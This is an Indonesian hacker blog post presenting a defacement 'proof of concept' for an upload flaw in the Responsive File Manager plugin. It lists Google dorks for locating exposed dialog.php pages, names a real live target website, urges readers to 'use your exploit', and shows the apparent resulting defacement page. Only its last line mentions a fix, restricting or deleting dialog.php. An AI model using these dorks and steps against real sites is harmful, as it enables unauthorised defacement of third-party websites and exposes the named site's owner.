Deface Poc Responsive File Manager (RFM)
Wednesday, October 30, 2019
Edit
Aloooo tmen temen, salam kenal dengan gw RomDhoni7, oiya gw share info soal kerentanan lagi nih Proof of Concept RFM.
Sebelumnya ada yg tau kerentanan rfm ini?, kerentanan ini mengijinkan sang attacker mengunggah file melalui plugin responsive filemanager.
Dork?
inurl:/filemanager/ intext:”dialog.php”
intitle:"index of filemanager" intext:dialog.php
inurl:/filemanager/dialog.php
inurl:/js/filemanager/ intext:”dialog.php”
inurl:/assets/filemanager/ intext:”dialog.php”
inurl:/assets/filemanager/ intext:”dialog.php”
Exploit: dialog.php
Live target: https://www.homoeoadda.in
Now use your exploit.
Examples: site/[path]/filemanager/dialog.php
Result: https://www.homoeoadda.in/source/index.html
Agar terhindar dari kerentaan rfm bisa dengan setting htaccess atau delete saja dir(directory) dialog.php